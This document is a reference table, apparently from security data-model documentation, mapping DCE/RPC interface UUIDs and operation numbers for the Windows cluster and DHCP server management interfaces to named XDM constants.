b97db8b2-4c63-11cf-bff6-08002be23f2f:20 XDM_CONST.DCERPC_OPERATION_API_REMOVE_RESOURCE_DEPENDENCY

b97db8b2-4c63-11cf-bff6-08002be23f2f:21 XDM_CONST.DCERPC_OPERATION_API_CAN_RESOURCE_BE_DEPENDENT

b97db8b2-4c63-11cf-bff6-08002be23f2f:22 XDM_CONST.DCERPC_OPERATION_API_CREATE_RES_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:23 XDM_CONST.DCERPC_OPERATION_API_ADD_RESOURCE_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:24 XDM_CONST.DCERPC_OPERATION_API_REMOVE_RESOURCE_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:25 XDM_CONST.DCERPC_OPERATION_API_CHANGE_RESOURCE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:26 XDM_CONST.DCERPC_OPERATION_API_CREATE_RESOURCE_TYPE

b97db8b2-4c63-11cf-bff6-08002be23f2f:27 XDM_CONST.DCERPC_OPERATION_API_DELETE_RESOURCE_TYPE

b97db8b2-4c63-11cf-bff6-08002be23f2f:28 XDM_CONST.DCERPC_OPERATION_API_GET_ROOT_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:29 XDM_CONST.DCERPC_OPERATION_API_CREATE_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:30 XDM_CONST.DCERPC_OPERATION_API_OPEN_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:31 XDM_CONST.DCERPC_OPERATION_API_ENUM_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:32 XDM_CONST.DCERPC_OPERATION_API_SET_VALUE

b97db8b2-4c63-11cf-bff6-08002be23f2f:33 XDM_CONST.DCERPC_OPERATION_API_DELETE_VALUE

b97db8b2-4c63-11cf-bff6-08002be23f2f:34 XDM_CONST.DCERPC_OPERATION_API_QUERY_VALUE

b97db8b2-4c63-11cf-bff6-08002be23f2f:35 XDM_CONST.DCERPC_OPERATION_API_DELETE_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:36 XDM_CONST.DCERPC_OPERATION_API_ENUM_VALUE

b97db8b2-4c63-11cf-bff6-08002be23f2f:37 XDM_CONST.DCERPC_OPERATION_API_CLOSE_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:38 XDM_CONST.DCERPC_OPERATION_API_QUERY_INFO_KEY
 Original Mapped Description

b97db8b2-4c63-11cf-bff6-08002be23f2f:39 XDM_CONST.DCERPC_OPERATION_API_SET_KEY_SECURITY

b97db8b2-4c63-11cf-bff6-08002be23f2f:40 XDM_CONST.DCERPC_OPERATION_API_GET_KEY_SECURITY

b97db8b2-4c63-11cf-bff6-08002be23f2f:41 XDM_CONST.DCERPC_OPERATION_API_OPEN_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:42 XDM_CONST.DCERPC_OPERATION_API_CREATE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:43 XDM_CONST.DCERPC_OPERATION_API_DELETE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:44 XDM_CONST.DCERPC_OPERATION_API_CLOSE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:45 XDM_CONST.DCERPC_OPERATION_API_GET_GROUP_STATE

b97db8b2-4c63-11cf-bff6-08002be23f2f:46 XDM_CONST.DCERPC_OPERATION_API_SET_GROUP_NAME

b97db8b2-4c63-11cf-bff6-08002be23f2f:47 XDM_CONST.DCERPC_OPERATION_API_GET_GROUP_ID

b97db8b2-4c63-11cf-bff6-08002be23f2f:48 XDM_CONST.DCERPC_OPERATION_API_GET_NODE_ID

b97db8b2-4c63-11cf-bff6-08002be23f2f:49 XDM_CONST.DCERPC_OPERATION_API_ONLINE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:50 XDM_CONST.DCERPC_OPERATION_API_OFFLINE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:51 XDM_CONST.DCERPC_OPERATION_API_MOVE_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:52 XDM_CONST.DCERPC_OPERATION_API_MOVE_GROUP_TO_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:53 XDM_CONST.DCERPC_OPERATION_API_CREATE_GROUP_RESOURCE_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:54 XDM_CONST.DCERPC_OPERATION_API_SET_GROUP_NODE_LIST

b97db8b2-4c63-11cf-bff6-08002be23f2f:55 XDM_CONST.DCERPC_OPERATION_API_CREATE_NOTIFY

b97db8b2-4c63-11cf-bff6-08002be23f2f:56 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NOTIFY

b97db8b2-4c63-11cf-bff6-08002be23f2f:57 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_CLUSTER

b97db8b2-4c63-11cf-bff6-08002be23f2f:58 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:59 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:60 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:61 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_KEY

b97db8b2-4c63-11cf-bff6-08002be23f2f:62 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:63 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_GROUP

b97db8b2-4c63-11cf-bff6-08002be23f2f:64 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_RESOURCE

b97db8b2-4c63-11cf-bff6-08002be23f2f:65 XDM_CONST.DCERPC_OPERATION_API_GET_NOTIFY

b97db8b2-4c63-11cf-bff6-08002be23f2f:66 XDM_CONST.DCERPC_OPERATION_API_OPEN_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:67 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:68 XDM_CONST.DCERPC_OPERATION_API_GET_NODE_STATE

b97db8b2-4c63-11cf-bff6-08002be23f2f:69 XDM_CONST.DCERPC_OPERATION_API_PAUSE_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:70 XDM_CONST.DCERPC_OPERATION_API_RESUME_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:71 XDM_CONST.DCERPC_OPERATION_API_EVICT_NODE

b97db8b2-4c63-11cf-bff6-08002be23f2f:72 XDM_CONST.DCERPC_OPERATION_API_NODE_RESOURCE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:73 XDM_CONST.DCERPC_OPERATION_API_RESOURCE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:74 XDM_CONST.DCERPC_OPERATION_API_NODE_RESOURCE_TYPE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:75 XDM_CONST.DCERPC_OPERATION_API_RESOURCE_TYPE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:76 XDM_CONST.DCERPC_OPERATION_API_NODE_GROUP_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:77 XDM_CONST.DCERPC_OPERATION_API_GROUP_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:78 XDM_CONST.DCERPC_OPERATION_API_NODE_NODE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:79 XDM_CONST.DCERPC_OPERATION_API_NODE_CONTROL
 Original Mapped Description

b97db8b2-4c63-11cf-bff6-08002be23f2f:81 XDM_CONST.DCERPC_OPERATION_API_OPEN_NETWORK

b97db8b2-4c63-11cf-bff6-08002be23f2f:82 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NETWORK

b97db8b2-4c63-11cf-bff6-08002be23f2f:83 XDM_CONST.DCERPC_OPERATION_API_GET_NETWORK_STATE

b97db8b2-4c63-11cf-bff6-08002be23f2f:84 XDM_CONST.DCERPC_OPERATION_API_SET_NETWORK_NAME

b97db8b2-4c63-11cf-bff6-08002be23f2f:85 XDM_CONST.DCERPC_OPERATION_API_CREATE_NETWORK_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:86 XDM_CONST.DCERPC_OPERATION_API_GET_NETWORK_ID

b97db8b2-4c63-11cf-bff6-08002be23f2f:87 XDM_CONST.DCERPC_OPERATION_API_SET_NETWORK_PRIORITY_ORDER

b97db8b2-4c63-11cf-bff6-08002be23f2f:88 XDM_CONST.DCERPC_OPERATION_API_NODE_NETWORK_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:89 XDM_CONST.DCERPC_OPERATION_API_NETWORK_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:90 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NETWORK

b97db8b2-4c63-11cf-bff6-08002be23f2f:91 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NETWORK

b97db8b2-4c63-11cf-bff6-08002be23f2f:92 XDM_CONST.DCERPC_OPERATION_API_OPEN_NET_INTERFACE

b97db8b2-4c63-11cf-bff6-08002be23f2f:93 XDM_CONST.DCERPC_OPERATION_API_CLOSE_NET_INTERFACE

b97db8b2-4c63-11cf-bff6-08002be23f2f:94 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE_STATE

b97db8b2-4c63-11cf-bff6-08002be23f2f:95 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE

b97db8b2-4c63-11cf-bff6-08002be23f2f:96 XDM_CONST.DCERPC_OPERATION_API_GET_NET_INTERFACE_ID

b97db8b2-4c63-11cf-bff6-08002be23f2f:97 XDM_CONST.DCERPC_OPERATION_API_NODE_NET_INTERFACE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:98 XDM_CONST.DCERPC_OPERATION_API_NET_INTERFACE_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:99 XDM_CONST.DCERPC_OPERATION_API_ADD_NOTIFY_NET_INTERFACE

b97db8b2-4c63-11cf-bff6-08002be23f2f:100 XDM_CONST.DCERPC_OPERATION_API_RE_ADD_NOTIFY_NET_INTERFACE

b97db8b2-4c63-11cf-bff6-08002be23f2f:101 XDM_CONST.DCERPC_OPERATION_API_CREATE_NODE_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:102 XDM_CONST.DCERPC_OPERATION_API_GET_CLUSTER_VERSION2

b97db8b2-4c63-11cf-bff6-08002be23f2f:103 XDM_CONST.DCERPC_OPERATION_API_CREATE_RES_TYPE_ENUM

b97db8b2-4c63-11cf-bff6-08002be23f2f:104 XDM_CONST.DCERPC_OPERATION_API_BACKUP_CLUSTER_DATABASE

b97db8b2-4c63-11cf-bff6-08002be23f2f:105 XDM_CONST.DCERPC_OPERATION_API_NODE_CLUSTER_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:106 XDM_CONST.DCERPC_OPERATION_API_CLUSTER_CONTROL

b97db8b2-4c63-11cf-bff6-08002be23f2f:107 XDM_CONST.DCERPC_OPERATION_API_UNBLOCK_GET_NOTIFY_CALL

b97db8b2-4c63-11cf-bff6-08002be23f2f:108 XDM_CONST.DCERPC_OPERATION_API_SET_SERVICE_ACCOUNT_PASSWORD

6bffd098-a112-3610-9833-46c3f874532d:0 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET

6bffd098-a112-3610-9833-46c3f874532d:1 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_INFO

6bffd098-a112-3610-9833-46c3f874532d:2 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO

6bffd098-a112-3610-9833-46c3f874532d:3 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNETS

6bffd098-a112-3610-9833-46c3f874532d:4 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT

6bffd098-a112-3610-9833-46c3f874532d:5 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS

6bffd098-a112-3610-9833-46c3f874532d:6 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT

6bffd098-a112-3610-9833-46c3f874532d:7 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUBNET

6bffd098-a112-3610-9833-46c3f874532d:8 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION

6bffd098-a112-3610-9833-46c3f874532d:9 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO

6bffd098-a112-3610-9833-46c3f874532d:10 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO

6bffd098-a112-3610-9833-46c3f874532d:11 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION

6bffd098-a112-3610-9833-46c3f874532d:12 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE
 Original Mapped Description

6bffd098-a112-3610-9833-46c3f874532d:13 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE

6bffd098-a112-3610-9833-46c3f874532d:14 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES

6bffd098-a112-3610-9833-46c3f874532d:15 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE

6bffd098-a112-3610-9833-46c3f874532d:16 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO

6bffd098-a112-3610-9833-46c3f874532d:17 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO

6bffd098-a112-3610-9833-46c3f874532d:18 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO

6bffd098-a112-3610-9833-46c3f874532d:19 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLIENT_INFO

6bffd098-a112-3610-9833-46c3f874532d:20 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS

6bffd098-a112-3610-9833-46c3f874532d:21 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_OPTIONS

6bffd098-a112-3610-9833-46c3f874532d:22 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO

6bffd098-a112-3610-9833-46c3f874532d:23 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS

6bffd098-a112-3610-9833-46c3f874532d:24 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUES

6bffd098-a112-3610-9833-46c3f874532d:25 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG

6bffd098-a112-3610-9833-46c3f874532d:26 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG

6bffd098-a112-3610-9833-46c3f874532d:27 XDM_CONST.DCERPC_OPERATION_R_DHCP_SCAN_DATABASE

6bffd098-a112-3610-9833-46c3f874532d:28 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_VERSION

6bffd098-a112-3610-9833-46c3f874532d:29 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V4

6bffd098-a112-3610-9833-46c3f874532d:30 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V4

6bffd098-a112-3610-9833-46c3f874532d:31 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V4

6bffd098-a112-3610-9833-46c3f874532d:32 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO_V4

6bffd098-a112-3610-9833-46c3f874532d:33 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_V4

6bffd098-a112-3610-9833-46c3f874532d:34 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_V4

6bffd098-a112-3610-9833-46c3f874532d:35 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V4

6bffd098-a112-3610-9833-46c3f874532d:36 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUPER_SCOPE_V4

6bffd098-a112-3610-9833-46c3f874532d:37 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUPER_SCOPE_INFO_V4

6bffd098-a112-3610-9833-46c3f874532d:38 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUPER_SCOPE_V4

6bffd098-a112-3610-9833-46c3f874532d:39 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_V4

6bffd098-a112-3610-9833-46c3f874532d:40 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_V4

6bffd098-a112-3610-9833-46c3f874532d:41 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_VQ

6bffd098-a112-3610-9833-46c3f874532d:42 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_VQ

6bffd098-a112-3610-9833-46c3f874532d:43 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_VQ

6bffd098-a112-3610-9833-46c3f874532d:44 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO_VQ

6bffd098-a112-3610-9833-46c3f874532d:45 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_VQ

6bffd098-a112-3610-9833-46c3f874532d:46 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_VQ

6bffd098-a112-3610-9833-46c3f874532d:47 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_VQ

6bffd098-a112-3610-9833-46c3f874532d:48 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET_VQ

6bffd098-a112-3610-9833-46c3f874532d:49 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO_VQ

6bffd098-a112-3610-9833-46c3f874532d:50 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_INFO_VQ

5b821720-f63b-11d0-aad2-00c04fc324db:0 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V5

5b821720-f63b-11d0-aad2-00c04fc324db:1 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_M_SCOPE_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:2 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_SCOPE_INFO
 Original Mapped Description

5b821720-f63b-11d0-aad2-00c04fc324db:3 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPES

5b821720-f63b-11d0-aad2-00c04fc324db:4 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_M_SCOPE_ELEMENT

5b821720-f63b-11d0-aad2-00c04fc324db:5 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPE_ELEMENTS

5b821720-f63b-11d0-aad2-00c04fc324db:6 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_M_SCOPE_ELEMENT

5b821720-f63b-11d0-aad2-00c04fc324db:7 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_M_SCOPE

5b821720-f63b-11d0-aad2-00c04fc324db:8 XDM_CONST.DCERPC_OPERATION_R_DHCP_SCAN_M_DATABASE

5b821720-f63b-11d0-aad2-00c04fc324db:9 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_M_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:10 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_M_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:11 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:12 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_M_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:13 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPE_CLIENTS

5b821720-f63b-11d0-aad2-00c04fc324db:14 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION_V5

5b821720-f63b-11d0-aad2-00c04fc324db:15 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO_V5

5b821720-f63b-11d0-aad2-00c04fc324db:16 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO_V5

5b821720-f63b-11d0-aad2-00c04fc324db:17 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS_V5

5b821720-f63b-11d0-aad2-00c04fc324db:18 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_V5

5b821720-f63b-11d0-aad2-00c04fc324db:19 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE_V5

5b821720-f63b-11d0-aad2-00c04fc324db:20 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUES_V5

5b821720-f63b-11d0-aad2-00c04fc324db:21 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE_V5

5b821720-f63b-11d0-aad2-00c04fc324db:22 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES_V5

5b821720-f63b-11d0-aad2-00c04fc324db:23 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE_V5

5b821720-f63b-11d0-aad2-00c04fc324db:24 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLASS

5b821720-f63b-11d0-aad2-00c04fc324db:25 XDM_CONST.DCERPC_OPERATION_R_DHCP_MODIFY_CLASS

5b821720-f63b-11d0-aad2-00c04fc324db:26 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLASS

5b821720-f63b-11d0-aad2-00c04fc324db:27 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLASS_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:28 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_CLASSES

5b821720-f63b-11d0-aad2-00c04fc324db:29 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTIONS

5b821720-f63b-11d0-aad2-00c04fc324db:30 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTION_VALUES

5b821720-f63b-11d0-aad2-00c04fc324db:31 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_CAST_MIB_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:32 XDM_CONST.DCERPC_OPERATION_R_DHCP_AUDIT_LOG_SET_PARAMS

5b821720-f63b-11d0-aad2-00c04fc324db:33 XDM_CONST.DCERPC_OPERATION_R_DHCP_AUDIT_LOG_GET_PARAMS

5b821720-f63b-11d0-aad2-00c04fc324db:34 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_QUERY_ATTRIBUTE

5b821720-f63b-11d0-aad2-00c04fc324db:35 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_QUERY_ATTRIBUTES

5b821720-f63b-11d0-aad2-00c04fc324db:36 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_REDO_AUTHORIZATION

5b821720-f63b-11d0-aad2-00c04fc324db:37 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V5

5b821720-f63b-11d0-aad2-00c04fc324db:38 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V5

5b821720-f63b-11d0-aad2-00c04fc324db:39 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V5

5b821720-f63b-11d0-aad2-00c04fc324db:40 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_BINDING_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:41 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SERVER_BINDING_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:42 XDM_CONST.DCERPC_OPERATION_R_DHCP_QUERY_DNS_REG_CREDENTIALS

5b821720-f63b-11d0-aad2-00c04fc324db:43 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_DNS_REG_CREDENTIALS
 Original Mapped Description

5b821720-f63b-11d0-aad2-00c04fc324db:44 XDM_CONST.DCERPC_OPERATION_R_DHCP_BACKUP_DATABASE

5b821720-f63b-11d0-aad2-00c04fc324db:45 XDM_CONST.DCERPC_OPERATION_R_DHCP_RESTORE_DATABASE

5b821720-f63b-11d0-aad2-00c04fc324db:46 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_SPECIFIC_STRINGS

5b821720-f63b-11d0-aad2-00c04fc324db:47 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION_V6

5b821720-f63b-11d0-aad2-00c04fc324db:48 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:49 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:50 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:51 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_V6

5b821720-f63b-11d0-aad2-00c04fc324db:52 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE_V6

5b821720-f63b-11d0-aad2-00c04fc324db:53 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES_V6

5b821720-f63b-11d0-aad2-00c04fc324db:54 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE_V6

5b821720-f63b-11d0-aad2-00c04fc324db:55 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTIONS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:56 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTION_VALUES_V6

5b821720-f63b-11d0-aad2-00c04fc324db:57 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET_V6

5b821720-f63b-11d0-aad2-00c04fc324db:58 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNETS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:59 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V6

5b821720-f63b-11d0-aad2-00c04fc324db:60 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:61 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V6

5b821720-f63b-11d0-aad2-00c04fc324db:62 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUBNET_V6

5b821720-f63b-11d0-aad2-00c04fc324db:63 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:64 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:65 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_V6

5b821720-f63b-11d0-aad2-00c04fc324db:66 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_V6

5b821720-f63b-11d0-aad2-00c04fc324db:67 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:69 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_BINDING_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:70 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SERVER_BINDING_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:71 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:72 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:73 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLIENT_INFO_V6

5b821720-f63b-11d0-aad2-00c04fc324db:74 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLASS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:75 XDM_CONST.DCERPC_OPERATION_R_DHCP_MODIFY_CLASS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:76 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLASS_V6

5b821720-f63b-11d0-aad2-00c04fc324db:77 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_CLASSES_V6

5b821720-f63b-11d0-aad2-00c04fc324db:78 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE_V6

5b821720-f63b-11d0-aad2-00c04fc324db:79 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_DELAY_OFFER

5b821720-f63b-11d0-aad2-00c04fc324db:80 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_DELAY_OFFER

5b821720-f63b-11d0-aad2-00c04fc324db:81 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_V5

